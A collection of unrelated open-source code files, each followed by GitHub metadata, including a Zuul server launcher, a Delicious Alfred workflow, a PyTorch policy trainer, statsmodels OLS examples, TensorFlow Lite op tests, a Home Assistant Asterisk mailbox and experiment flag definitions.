self.config.get('smtp', 'default_to')
if self.config.has_option('smtp', 'default_to') else 'zuul',
self.config.get('smtp', 'server')
if self.config.has_option('smtp', 'server') else 'localhost',
self.config.get('smtp', 'port')
if self.config.has_option('smtp', 'port') else 25
)
self.sched.setLauncher(gearman)
self.sched.registerTrigger(gerrit)
self.sched.registerTrigger(timer)
self.sched.registerTrigger(messaging)
self.sched.registerReporter(gerrit_reporter)
self.sched.registerReporter(smtp_reporter)
self.sched.start()
self.sched.reconfigure(self.config)
self.sched.resume()
webapp.start()
rpc.start()
signal.signal(signal.SIGHUP, self.reconfigure_handler)
signal.signal(signal.SIGUSR1, self.exit_handler)
signal.signal(signal.SIGUSR2, stack_dump_handler)
signal.signal(signal.SIGTERM, self.term_handler)
while True:
try:
signal.pause()
except KeyboardInterrupt:
print "Ctrl + C: asking scheduler to exit nicely...\n"
self.exit_handler(signal.SIGINT, None)
def main():
server = Server()
server.parse_arguments()
server.read_config()
if server.args.layout:
server.config.set('zuul', 'layout_config', server.args.layout)
if server.args.validate:
path = server.args.validate
if path is True:
path = None
sys.exit(server.test_config(path))
if server.config.has_option('zuul', 'state_dir'):
state_dir = os.path.expanduser(server.config.get('zuul', 'state_dir'))
else:
state_dir = '/var/lib/zuul'
test_fn = os.path.join(state_dir, 'test')
try:
f = open(test_fn, 'w')
f.close()
os.unlink(test_fn)
except:
print
print "Unable to write to state directory: %s" % state_dir
print
raise
if server.config.has_option('zuul', 'pidfile'):
pid_fn = os.path.expanduser(server.config.get('zuul', 'pidfile'))
else:
pid_fn = '/var/run/zuul/zuul.pid'
pid = pid_file_module.TimeoutPIDLockFile(pid_fn, 10)
if server.args.nodaemon:
server.main()
else:
with daemon.DaemonContext(pidfile=pid):
server.main()
if __name__ == "__main__":
sys.path.insert(0, '.')
main()
| {
"content_hash": "f4743bd541a7f41995c143e4127353c0",
"timestamp": "",
"source": "github",
"line_count": 265,
"max_line_length": 78,
"avg_line_length": 35.82641509433962,
"alnum_prop": 0.5931114388034548,
"repo_name": "devdattakulkarni/zuul_messaging",
"id": "7b45b9b104637cf804d90cec0f67b6dde138e5a2",
"size": "10161",
"binary": false,
"copies": "1",
"ref": "refs/heads/solum_messaging_trigger",
"path": "zuul/cmd/server.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "9486"
},
{
"name": "Python",
"bytes": "352158"
},
{
"name": "Shell",
"bytes": "594"
}
],
"symlink_target": ""
} |
import api
import workflow
def get_posts(access_token):
response = api.Delicious(access_token).posts.all()
posts = response['posts']['post']
return posts
def main(wf):
try:
# Get API key from Keychain
access_token = wf.get_password('delicious_access_token')
except workflow.PasswordNotFound: # API key has not yet been set
# Nothing we can do about this, so just log it
wf.logger.error('No API key saved')
return 0
wf.cached_data('delicious_posts', lambda: get_posts(access_token), max_age=600)
if __name__ == '__main__':
workflow.Workflow().run(main)
| {
"content_hash": "87806649cd653d9d185504183a78d554",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 83,
"avg_line_length": 27.26086956521739,
"alnum_prop": 0.6475279106858054,
"repo_name": "scraplesh/delicious-alfredworkflow",
"id": "2bd1d977a5ea6cfbcb6af78f493d9f085111aaf4",
"size": "627",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "update.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "900967"
},
{
"name": "XML",
"bytes": "5951"
}
],
"symlink_target": ""
} |
import torch as t
from torch.autograd import Variable as V
from torch import FloatTensor as FT
import numpy as np
from bayestorch.hmc import HMCSampler
class SimpleTrainer:
def __init__(self, env,critic,hallucinator,policy_buffer,policy_c, noise_dim):
self.env = env
self.hallucinator = hallucinator
self.critic = critic
self.policy_buffer = policy_buffer
self.policy_c = policy_c
self.noise_dim = noise_dim
def train(self, train_steps,sample_steps,opt_steps):
in_dim=self.env.obs_size
out_dim=self.env.action_size
cur_policy = self.policy_c(in_dim,out_dim)
for i in range(train_steps):
reward = self.sample_episode(cur_policy)
self.policy_buffer.put(cur_policy.state_dict(),reward)
self.train_critic_hallucinator(sample_steps)
self.train_policy(opt_steps)
def sample_episode(self, policy,n=1,skip = 3):
done = False
total_reward = 0
for i in range(n):
cur_obs = self.env.new_episode()
t = 0
while not done:
cur_obs = V(FT(cur_obs)).unsqueeze(0)
display = (t % skip == 0)
cur_action = policy.forward(cur_obs).data.cpu().numpy()
cur_obs,cur_reward,done = self.env.next_obs(cur_action.squeeze(0), render = display)
total_reward += cur_reward
t += 1
avg_episode_reward = total_reward / n
return avg_episode_reward
def train_critic_hallucinator(self,sample_steps):
def closure_gen():
yield (lambda: self.critic.get_prior_llh())
for state_dict,reward in self.policy_buffer:
policy = self.policy_c(self.env.obs_size, self.env.action_size)
policy.load_state_dict(state_dict)
def closure():
noise=V(FT(np.random.randn(self.noise_dim)))
states = self.hallucinator.forward(noise.unsqueeze(0))
# Concatenating dimensions of bath(which is currently 1) and dimensions of
states = states.view(states.size(0)*self.hallucinator.n, -1)
actions = policy.forward(states)
actions = actions.view(1,-1)
states = states.view(1,-1)
mean = self.critic(states,actions)[0]
lsd = self.critic(states,actions)[0]
llh = gaussian_llh(mean,lsd,reward)
return reward
yield closure
params = self.critic.parameter_list() \
+ self.hallucinator.parameter_list()
sampler = HMCSampler(params)
for i in range(sample_steps):
sampler.step(closure_gen)
def train_policy(self,opt_steps):
state_dict, _ = self.policy_buffer.peek()
policy = self.policy_c(self.env.obs_size, self.env.action_size)
policy.load_state_dict(state_dict)
opt = t.optim.SGD(policy.parameters(), lr=0.001)
# This is bad just have one goddamnit
def closure():
noise=V(FT(np.random.randn(self.noise_dim)))
states = self.hallucinator.forward(noise.unsqueeze(0))
# Concatenating dimensions of bath(which is currently 1) and dimensions of
states = states.view(states.size(0)*self.hallucinator.n, -1)
actions = policy.forward(states)
actions = actions.view(1,-1)
states = states.view(1,-1)
reward = self.critic(states,actions)[0]
return reward
for i in range(opt_steps):
opt.zero_grad()
opt.step(closure)
return policy.state_dict()
def gaussian_llh(mean,log_std_dev,reward):
llh = -(mean-reward)**2 - 2*log_std_dev
return llh
| {
"content_hash": "0c78b6a761b9626b72903fff9a0d8123",
"timestamp": "",
"source": "github",
"line_count": 107,
"max_line_length": 100,
"avg_line_length": 36.06542056074766,
"alnum_prop": 0.5750194350868101,
"repo_name": "fizz-ml/policybandit",
"id": "b88696a3e87855e5a9061958b5aecb47382f1178",
"size": "3859",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "trainer.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "19257"
}
],
"symlink_target": ""
} |
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import statsmodels.api as sm
np.random.seed(9876789)
# ## OLS estimation
#
# Artificial data:
nsample = 100
x = np.linspace(0, 10, 100)
X = np.column_stack((x, x**2))
beta = np.array([1, 0.1, 10])
e = np.random.normal(size=nsample)
# Our model needs an intercept so we add a column of 1s:
X = sm.add_constant(X)
y = np.dot(X, beta) + e
# Fit and summary:
model = sm.OLS(y, X)
results = model.fit()
print(results.summary())
# Quantities of interest can be extracted directly from the fitted model.
# Type ``dir(results)`` for a full list. Here are some examples:
print("Parameters: ", results.params)
print("R2: ", results.rsquared)
# ## OLS non-linear curve but linear in parameters
#
# We simulate artificial data with a non-linear relationship between x and
# y:
nsample = 50
sig = 0.5
x = np.linspace(0, 20, nsample)
X = np.column_stack((x, np.sin(x), (x - 5)**2, np.ones(nsample)))
beta = [0.5, 0.5, -0.02, 5.0]
y_true = np.dot(X, beta)
y = y_true + sig * np.random.normal(size=nsample)
# Fit and summary:
res = sm.OLS(y, X).fit()
print(res.summary())
# Extract other quantities of interest:
print("Parameters: ", res.params)
print("Standard errors: ", res.bse)
print("Predicted values: ", res.predict())
# Draw a plot to compare the true relationship to OLS predictions.
# Confidence intervals around the predictions are built using the
# ``wls_prediction_std`` command.
pred_ols = res.get_prediction()
iv_l = pred_ols.summary_frame()["obs_ci_lower"]
iv_u = pred_ols.summary_frame()["obs_ci_upper"]
fig, ax = plt.subplots(figsize=(8, 6))
ax.plot(x, y, "o", label="data")
ax.plot(x, y_true, "b-", label="True")
ax.plot(x, res.fittedvalues, "r--.", label="OLS")
ax.plot(x, iv_u, "r--")
ax.plot(x, iv_l, "r--")
ax.legend(loc="best")
# ## OLS with dummy variables
#
# We generate some artificial data. There are 3 groups which will be
# modelled using dummy variables. Group 0 is the omitted/benchmark category.
nsample = 50
groups = np.zeros(nsample, int)
groups[20:40] = 1
groups[40:] = 2
# dummy = (groups[:,None] == np.unique(groups)).astype(float)
dummy = pd.get_dummies(groups).values
x = np.linspace(0, 20, nsample)
# drop reference category
X = np.column_stack((x, dummy[:, 1:]))
X = sm.add_constant(X, prepend=False)
beta = [1.0, 3, -3, 10]
y_true = np.dot(X, beta)
e = np.random.normal(size=nsample)
y = y_true + e
# Inspect the data:
print(X[:5, :])
print(y[:5])
print(groups)
print(dummy[:5, :])
# Fit and summary:
res2 = sm.OLS(y, X).fit()
print(res2.summary())
# Draw a plot to compare the true relationship to OLS predictions:
pred_ols2 = res2.get_prediction()
iv_l = pred_ols2.summary_frame()["obs_ci_lower"]
iv_u = pred_ols2.summary_frame()["obs_ci_upper"]
fig, ax = plt.subplots(figsize=(8, 6))
ax.plot(x, y, "o", label="Data")
ax.plot(x, y_true, "b-", label="True")
ax.plot(x, res2.fittedvalues, "r--.", label="Predicted")
ax.plot(x, iv_u, "r--")
ax.plot(x, iv_l, "r--")
legend = ax.legend(loc="best")
# ## Joint hypothesis test
#
# ### F test
#
# We want to test the hypothesis that both coefficients on the dummy
# variables are equal to zero, that is, $R \times \beta = 0$. An F test
# leads us to strongly reject the null hypothesis of identical constant in
# the 3 groups:
R = [[0, 1, 0, 0], [0, 0, 1, 0]]
print(np.array(R))
print(res2.f_test(R))
# You can also use formula-like syntax to test hypotheses
print(res2.f_test("x2 = x3 = 0"))
# ### Small group effects
#
# If we generate artificial data with smaller group effects, the T test
# can no longer reject the Null hypothesis:
beta = [1.0, 0.3, -0.0, 10]
y_true = np.dot(X, beta)
y = y_true + np.random.normal(size=nsample)
res3 = sm.OLS(y, X).fit()
print(res3.f_test(R))
print(res3.f_test("x2 = x3 = 0"))
# ### Multicollinearity
#
# The Longley dataset is well known to have high multicollinearity. That
# is, the exogenous predictors are highly correlated. This is problematic
# because it can affect the stability of our coefficient estimates as we
# make minor changes to model specification.
from statsmodels.datasets.longley import load_pandas
y = load_pandas().endog
X = load_pandas().exog
X = sm.add_constant(X)
# Fit and summary:
ols_model = sm.OLS(y, X)
ols_results = ols_model.fit()
print(ols_results.summary())
# #### Condition number
#
# One way to assess multicollinearity is to compute the condition number.
# Values over 20 are worrisome (see Greene 4.9). The first step is to
# normalize the independent variables to have unit length:
norm_x = X.values
for i, name in enumerate(X):
if name == "const":
continue
norm_x[:, i] = X[name] / np.linalg.norm(X[name])
norm_xtx = np.dot(norm_x.T, norm_x)
# Then, we take the square root of the ratio of the biggest to the
# smallest eigen values.
eigs = np.linalg.eigvals(norm_xtx)
condition_number = np.sqrt(eigs.max() / eigs.min())
print(condition_number)
# #### Dropping an observation
#
# Greene also points out that dropping a single observation can have a
# dramatic effect on the coefficient estimates:
ols_results2 = sm.OLS(y.iloc[:14], X.iloc[:14]).fit()
print("Percentage change %4.2f%%\n" * 7 % tuple([
i for i in (ols_results2.params - ols_results.params) /
ols_results.params * 100
]))
# We can also look at formal statistics for this such as the DFBETAS -- a
# standardized measure of how much each coefficient changes when that
# observation is left out.
infl = ols_results.get_influence()
# In general we may consider DBETAS in absolute value greater than
# $2/\sqrt{N}$ to be influential observations
2.0 / len(X)**0.5
print(infl.summary_frame().filter(regex="dfb"))
| {
"content_hash": "48f5dfe03a8ecc052b21f9422ce6cce7",
"timestamp": "",
"source": "github",
"line_count": 219,
"max_line_length": 76,
"avg_line_length": 25.91324200913242,
"alnum_prop": 0.6845814977973568,
"repo_name": "josef-pkt/statsmodels",
"id": "1b1a76ebcf442c1196e66deafc844a31c245b634",
"size": "5894",
"binary": false,
"copies": "3",
"ref": "refs/heads/main",
"path": "examples/python/ols.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "AGS Script",
"bytes": "457842"
},
{
"name": "Assembly",
"bytes": "10035"
},
{
"name": "Batchfile",
"bytes": "625"
},
{
"name": "C",
"bytes": "381"
},
{
"name": "Cython",
"bytes": "225838"
},
{
"name": "Fortran",
"bytes": "16671"
},
{
"name": "HTML",
"bytes": "148470"
},
{
"name": "MATLAB",
"bytes": "100525"
},
{
"name": "Python",
"bytes": "14428857"
},
{
"name": "R",
"bytes": "106569"
},
{
"name": "Shell",
"bytes": "25322"
},
{
"name": "Stata",
"bytes": "50129"
}
],
"symlink_target": ""
} |
"""Test configs for binary_op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tensorflow.lite.testing.zip_test_utils import create_tensor_data
from tensorflow.lite.testing.zip_test_utils import make_zip_of_tests
from tensorflow.lite.testing.zip_test_utils import register_make_test_function
def make_binary_op_tests(options,
binary_operator,
allow_fully_quantize=False,
expected_tf_failures=0):
"""Make a set of tests to do binary ops with and without broadcast."""
test_parameters = [
# Avoid creating all combinations to keep the test size small.
{
"dtype": [tf.float32, tf.int32],
"input_shape_1": [[1, 3, 4, 3]],
"input_shape_2": [[1, 3, 4, 3]],
"activation": [True],
"fully_quantize": [False],
},
{
"dtype": [tf.float32],
"input_shape_1": [[5]],
"input_shape_2": [[5]],
"activation": [False, True],
"fully_quantize": [False],
},
{
"dtype": [tf.float32, tf.int32, tf.int64],
"input_shape_1": [[1, 3, 4, 3]],
"input_shape_2": [[3]],
"activation": [True, False],
"fully_quantize": [False],
},
{
"dtype": [tf.float32, tf.int32],
"input_shape_1": [[3]],
"input_shape_2": [[1, 3, 4, 3]],
"activation": [True, False],
"fully_quantize": [False],
},
{
"dtype": [tf.float32],
"input_shape_1": [[]],
"input_shape_2": [[]],
"activation": [False],
"fully_quantize": [False],
},
{
"dtype": [tf.float32],
"input_shape_1": [[0]],
"input_shape_2": [[1]],
"activation": [False],
"fully_quantize": [False],
},
{
"dtype": [tf.float32],
"input_shape_1": [[1, 3, 4, 3]],
"input_shape_2": [[1, 3, 4, 3]],
"activation": [False],
"fully_quantize": [True],
},
{
"dtype": [tf.float32],
"input_shape_1": [[5]],
"input_shape_2": [[5]],
"activation": [False],
"fully_quantize": [True],
},
{
"dtype": [tf.float32],
"input_shape_1": [[1, 3, 4, 3]],
"input_shape_2": [[3]],
"activation": [False],
"fully_quantize": [True],
},
{
"dtype": [tf.float32],
"input_shape_1": [[3]],
"input_shape_2": [[1, 3, 4, 3]],
"activation": [False],
"fully_quantize": [True],
},
{
"dtype": [tf.float32],
"input_shape_1": [[]],
"input_shape_2": [[]],
"activation": [False],
"fully_quantize": [True],
},
]
# test_parameters include fully_quantize option only when
# allow_fully_quantize is True.
if not allow_fully_quantize:
test_parameters = [
test_parameter for test_parameter in test_parameters
if True not in test_parameter["fully_quantize"]
]
def build_graph(parameters):
"""Builds the graph given the current parameters."""
input1 = tf.compat.v1.placeholder(
dtype=parameters["dtype"],
name="input1",
shape=parameters["input_shape_1"])
input2 = tf.compat.v1.placeholder(
dtype=parameters["dtype"],
name="input2",
shape=parameters["input_shape_2"])
out = binary_operator(input1, input2)
# TODO(karimnosseir): Update condition after moving to new converter.
if parameters["activation"] and (not options.use_experimental_converter or
(parameters["dtype"] != tf.int32 and
parameters["dtype"] != tf.int64)):
out = tf.nn.relu(out)
return [input1, input2], [out]
def build_inputs(parameters, sess, inputs, outputs):
"""Builds operand inputs for op."""
if allow_fully_quantize:
input1 = create_tensor_data(
parameters["dtype"],
parameters["input_shape_1"],
min_value=-1,
max_value=1)
input2 = create_tensor_data(
parameters["dtype"],
parameters["input_shape_2"],
min_value=-1,
max_value=1)
else:
input1 = create_tensor_data(parameters["dtype"],
parameters["input_shape_1"])
input2 = create_tensor_data(parameters["dtype"],
parameters["input_shape_2"])
return [input1, input2], sess.run(
outputs, feed_dict={
inputs[0]: input1,
inputs[1]: input2
})
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=expected_tf_failures)
def make_binary_op_tests_func(binary_operator):
"""Return a function that does a test on a binary operator."""
return lambda options: make_binary_op_tests(options, binary_operator)
@register_make_test_function()
def make_add_tests(options):
make_binary_op_tests(options, tf.add, allow_fully_quantize=True)
@register_make_test_function()
def make_div_tests(options):
make_binary_op_tests(options, tf.compat.v1.div)
@register_make_test_function()
def make_sub_tests(options):
make_binary_op_tests(options, tf.subtract, allow_fully_quantize=True)
@register_make_test_function()
def make_mul_tests(options):
make_binary_op_tests(options, tf.multiply, allow_fully_quantize=True)
@register_make_test_function()
def make_pow_tests(options):
make_binary_op_tests(options, tf.pow, expected_tf_failures=7)
@register_make_test_function()
def make_floor_div_tests(options):
make_binary_op_tests(options, tf.math.floordiv)
@register_make_test_function()
def make_floor_mod_tests(options):
make_binary_op_tests(options, tf.math.floormod)
@register_make_test_function()
def make_squared_difference_tests(options):
make_binary_op_tests(options, tf.math.squared_difference)
| {
"content_hash": "f124f361db123d95774a363b77f6ee62",
"timestamp": "",
"source": "github",
"line_count": 199,
"max_line_length": 78,
"avg_line_length": 30.798994974874372,
"alnum_prop": 0.5557187143090226,
"repo_name": "arborh/tensorflow",
"id": "88702b0542fa3b6203ffc5ccf2dbfc6979eb07d7",
"size": "6818",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tensorflow/lite/testing/op_tests/binary_op.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "5003"
},
{
"name": "Batchfile",
"bytes": "45988"
},
{
"name": "C",
"bytes": "773694"
},
{
"name": "C#",
"bytes": "8562"
},
{
"name": "C++",
"bytes": "76730781"
},
{
"name": "CMake",
"bytes": "6545"
},
{
"name": "Dockerfile",
"bytes": "81136"
},
{
"name": "Go",
"bytes": "1679107"
},
{
"name": "HTML",
"bytes": "4686483"
},
{
"name": "Java",
"bytes": "952944"
},
{
"name": "Jupyter Notebook",
"bytes": "567243"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "MLIR",
"bytes": "1299305"
},
{
"name": "Makefile",
"bytes": "61397"
},
{
"name": "Objective-C",
"bytes": "104706"
},
{
"name": "Objective-C++",
"bytes": "297753"
},
{
"name": "PHP",
"bytes": "24055"
},
{
"name": "Pascal",
"bytes": "3752"
},
{
"name": "Pawn",
"bytes": "17546"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "Python",
"bytes": "38757009"
},
{
"name": "RobotFramework",
"bytes": "891"
},
{
"name": "Ruby",
"bytes": "7459"
},
{
"name": "Shell",
"bytes": "643787"
},
{
"name": "Smarty",
"bytes": "34727"
},
{
"name": "Swift",
"bytes": "62814"
}
],
"symlink_target": ""
} |
"""
RDFlib Store implementation for Django, providing lots of extra goodies.
Use this application by just including it in your INSTALLED_APPS. After this,
you can create a new Graph using:
>>> import rdflib
>>> g = rdflib.Graph('Django')
"""
from rdflib.plugin import register
from rdflib.store import Store
register('Django', Store, 'rdflib_django.store', 'DjangoStore')
| {
"content_hash": "e5d8ff137451e5a0ed81eee6c29f097b",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 77,
"avg_line_length": 25.133333333333333,
"alnum_prop": 0.7506631299734748,
"repo_name": "publysher/rdflib-django",
"id": "0dab3f69aac8a574be5a3ff15ce8f028ab51ff2c",
"size": "377",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/rdflib_django/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "63553"
}
],
"symlink_target": ""
} |
from swgpy.object import *
def create(kernel):
result = Tangible()
result.template = "object/tangible/wearables/bandolier/shared_ith_mercenary_bandolier.iff"
result.attribute_template_id = 11
result.stfName("item_n","ith_mercenary_bandolier")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result | {
"content_hash": "2c7a486016af13c3ff42a96f268af91a",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 91,
"avg_line_length": 25.53846153846154,
"alnum_prop": 0.7168674698795181,
"repo_name": "obi-two/Rebelion",
"id": "b78eb5e2f6af9261200e26b4d66c8c02eb752a16",
"size": "477",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "data/scripts/templates/object/tangible/wearables/bandolier/shared_ith_mercenary_bandolier.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11818"
},
{
"name": "C",
"bytes": "7699"
},
{
"name": "C++",
"bytes": "2293610"
},
{
"name": "CMake",
"bytes": "39727"
},
{
"name": "PLSQL",
"bytes": "42065"
},
{
"name": "Python",
"bytes": "7499185"
},
{
"name": "SQLPL",
"bytes": "41864"
}
],
"symlink_target": ""
} |
"""
Asterisk Voicemail interface.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/mailbox.asteriskvm/
"""
import logging
from homeassistant.components.asterisk_mbox import DOMAIN as ASTERISK_DOMAIN
from homeassistant.components.mailbox import (
CONTENT_TYPE_MPEG, Mailbox, StreamError)
from homeassistant.core import callback
from homeassistant.helpers.dispatcher import async_dispatcher_connect
_LOGGER = logging.getLogger(__name__)
DEPENDENCIES = ['asterisk_mbox']
SIGNAL_MESSAGE_REQUEST = 'asterisk_mbox.message_request'
SIGNAL_MESSAGE_UPDATE = 'asterisk_mbox.message_updated'
async def async_get_handler(hass, config, discovery_info=None):
"""Set up the Asterix VM platform."""
return AsteriskMailbox(hass, ASTERISK_DOMAIN)
class AsteriskMailbox(Mailbox):
"""Asterisk VM Sensor."""
def __init__(self, hass, name):
"""Initialize Asterisk mailbox."""
super().__init__(hass, name)
async_dispatcher_connect(
self.hass, SIGNAL_MESSAGE_UPDATE, self._update_callback)
@callback
def _update_callback(self, msg):
"""Update the message count in HA, if needed."""
self.async_update()
@property
def media_type(self):
"""Return the supported media type."""
return CONTENT_TYPE_MPEG
@property
def can_delete(self):
"""Return if messages can be deleted."""
return True
@property
def has_media(self):
"""Return if messages have attached media files."""
return True
async def async_get_media(self, msgid):
"""Return the media blob for the msgid."""
from asterisk_mbox import ServerError
client = self.hass.data[ASTERISK_DOMAIN].client
try:
return client.mp3(msgid, sync=True)
except ServerError as err:
raise StreamError(err)
async def async_get_messages(self):
"""Return a list of the current messages."""
return self.hass.data[ASTERISK_DOMAIN].messages
def async_delete(self, msgid):
"""Delete the specified messages."""
client = self.hass.data[ASTERISK_DOMAIN].client
_LOGGER.info("Deleting: %s", msgid)
client.delete(msgid)
return True
| {
"content_hash": "99d60a83c0dc543880c396caa73ff20c",
"timestamp": "",
"source": "github",
"line_count": 75,
"max_line_length": 76,
"avg_line_length": 30.56,
"alnum_prop": 0.6697207678883071,
"repo_name": "tinloaf/home-assistant",
"id": "087018084f2c781ce5f3a6374c8a33afaa4a564c",
"size": "2292",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "homeassistant/components/mailbox/asterisk_mbox.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "1175"
},
{
"name": "Dockerfile",
"bytes": "1099"
},
{
"name": "Python",
"bytes": "13135313"
},
{
"name": "Ruby",
"bytes": "745"
},
{
"name": "Shell",
"bytes": "17137"
}
],
"symlink_target": ""
} |
"""Trains a classifier and evaluates finetuning performance. Specifically for sequential training of models"""
from typing import Sequence
from absl import app
from absl import flags
from absl import logging
import numpy as np # pylint: disable=unused-import
import resnet
import tensorflow as tf
from load_data import load_data
from train import train
from model import *
FLAGS = flags.FLAGS
flags.DEFINE_float('batch_norm_decay', 0.9, 'Batch norm decay parameter.')
flags.DEFINE_float('rr_weight', 0.0,
'Weight for the redundancy reduction term.')
flags.DEFINE_bool('use_rr_loss', False, 'Use redundancy reduction term.')
flags.DEFINE_bool('class_specific_rr_loss', True, 'Use class specific RR loss.')
flags.DEFINE_float('learning_rate', 0.001, 'Initial learning rate.')
flags.DEFINE_float('momentum', 0.9, 'momentum for SGD.')
flags.DEFINE_integer('train_batch_size', 64, 'Batch size for training.')
flags.DEFINE_integer('train_epochs', 100, 'Number of epochs to train for.')
flags.DEFINE_integer('train_epochs_finetune', 50,
'Number of epochs to finetune for.')
flags.DEFINE_integer('train_steps', 0,
'Number of train steps. If > 0, overrides train epochs')
flags.DEFINE_integer(
'train_steps_finetune', 0,
'Number of train finetune steps. If > 0, overrides train epochs finetune')
flags.DEFINE_integer(
'eval_steps', 0,
'Number of steps to eval for. If not provided, evals over entire dataset.')
flags.DEFINE_integer('lr_decay_gap', 50, 'Gap between decaying lr')
flags.DEFINE_float('lr_decay_factor', 0.5, 'Value to decay lr by')
flags.DEFINE_integer('val_batch_size', 256, 'Batch size for eval.')
flags.DEFINE_integer('test_batch_size', 256, 'Batch size for eval.')
flags.DEFINE_integer('num_train', -1, 'Num training examples.')
flags.DEFINE_integer('num_test', -1, 'Num test examples.')
flags.DEFINE_integer('num_train_finetune', 20000,
'Num training examples for finetuning.')
flags.DEFINE_integer('num_test_finetune', 2000,
'Num test examples for finetuning.')
flags.DEFINE_integer('buffer_size', 256, 'Buffer size for shuffling.')
flags.DEFINE_integer('checkpoint_epochs', 1,
'Number of epochs between checkpoints/summaries.')
flags.DEFINE_string('dataset', 'waterbirds', 'Name of a dataset.')
flags.DEFINE_bool(
'cache_dataset', False,
'Whether to cache the entire dataset in memory. If the dataset is '
'ImageNet, this is a very bad idea, but for smaller datasets it can '
'improve performance.')
flags.DEFINE_bool('use_dropout_pretrain', False,
'Whether to use dropout on the final layer for pretraining.')
flags.DEFINE_float('dropout_rate', 0.0,
'Dropout rate for final layer for pretraining.')
flags.DEFINE_bool(
'finetune_from_random', False,
'Whether to initialize the finetuning model using random weights.')
flags.DEFINE_enum(
'train_mode', 'pretrain', ['pretrain', 'finetune'],
'The train mode controls different objectives and trainable components.')
flags.DEFINE_string('platform', 'GPU', 'To be run on GPU or TPU.')
flags.DEFINE_float('validation_split', 0.2,
'Validation split to use while training.')
flags.DEFINE_string(
'checkpoint', None,
'Loading from the given checkpoint for fine-tuning if a finetuning '
'checkpoint does not already exist in model_dir.')
flags.DEFINE_string('optimizer', 'sgd', 'Optimizer to be used.')
flags.DEFINE_bool('project_out_prev_w', False, 'Project out previous w')
flags.DEFINE_bool(
'zero_init_logits_layer', False,
'If True, zero initialize layers after avg_pool for supervised learning.')
flags.DEFINE_bool('use_data_aug_with_DRO', False, 'True or False')
flags.DEFINE_integer(
'fine_tune_after_block', -1,
'The layers after which block that we will fine-tune. -1 means fine-tuning '
'everything. 0 means fine-tuning after stem block. 4 means fine-tuning '
'just the linear head.')
flags.DEFINE_integer('keep_checkpoint_max', 5,
'Maximum number of checkpoints to keep.')
flags.DEFINE_enum('lr_decay_type', 'step_decay', ['step_decay', 'cosine_decay', 'warmup_cosine_decay'],
'Kind of decay to be used for learning rate')
flags.DEFINE_enum('learning_rate_scaling', 'linear', ['linear', 'sqrt'],
'Learning rate scaling to use')
flags.DEFINE_integer('warmup_steps', 0, 'Warmup steps for warmup and cosine decay')
flags.DEFINE_integer('warmup_epochs', 20, 'Warmup epochs for warmup and cosine decay')
flags.DEFINE_boolean(
'global_bn', True,
'Whether to aggregate BN statistics across distributed cores.')
flags.DEFINE_integer('proj_dim', 20, 'Output dimension of projection head')
flags.DEFINE_integer(
'num_heads', 1,
'Number of heads across which to decorrelate. One head is the standard config'
)
flags.DEFINE_integer('width_multiplier', 1,
'Multiplier to change width of network.')
flags.DEFINE_integer('resnet_depth', 50, 'Depth of ResNet.')
flags.DEFINE_float(
'sk_ratio', 0.,
'If it is bigger than 0, it will enable SK. Recommendation: 0.0625.')
flags.DEFINE_float('se_ratio', 0., 'If it is bigger than 0, it will enable SE.')
flags.DEFINE_float('weight_decay', 1e-4, 'weight decay to be used')
flags.DEFINE_float('logit_decay', 0.0, 'Decay to be used on logits')
flags.DEFINE_integer('image_size', 32, 'Input image size.')
flags.DEFINE_integer('val_epochs_gap', 10, 'Epoch gap to run validation after')
flags.DEFINE_integer('finetune_val_epochs_gap', 10,
'Epoch gap to run validation after')
flags.DEFINE_integer('val_steps_gap', 0, 'Steps gap to run validation after')
flags.DEFINE_integer('finetune_val_steps_gap', 0,
'Steps gap to run validation after')
flags.DEFINE_boolean('use_pretrained', True, 'whether to use pretrained model')
flags.DEFINE_string(
'path', '/cns/sa-d/home/mloa/data/waterbirds_landbirds/waterbirds.pkl',
'path for the dataset')
flags.DEFINE_bool('use_OOD_transform', False,
'Use data preprocessing specific to OOD dataset')
flags.DEFINE_float('clip_norm', None, 'global clip norm for the gradient')
flags.DEFINE_integer('num_runs', 1,
'Number of runs to average the evaluations over')
flags.DEFINE_integer('num_head_layers', 1, 'Number of layers to use in head')
flags.DEFINE_bool('use_early_stopping', False, 'Whether to use early stopping based on validation accuracy or not')
flags.DEFINE_integer('proj_layer', 0,
'Layer in head where applying projection for rr')
flags.DEFINE_integer('head_dim', 512, 'Dimension of head layers')
flags.DEFINE_string('model_dir', None, 'Path for loading/saving a model')
flags.DEFINE_string('model_finetune_dir', None,
'Path for loading/saving the model after finetuning')
flags.DEFINE_bool('use_seq_rr', True, 'Whether to use rr loss sequentially')
flags.DEFINE_integer('num_seq_models', 2, 'Number of sequential models to train')
flags.DEFINE_bool('load_model', False, 'whether to try to load model')
flags.DEFINE_bool('save_model', False, 'whether to save model')
flags.DEFINE_bool('lowerbound_rr', False, 'Whether to lowerbound rr loss')
flags.DEFINE_float('lowerbound_factor', 0.5, 'If lowerbound rr, by what factor of expected value')
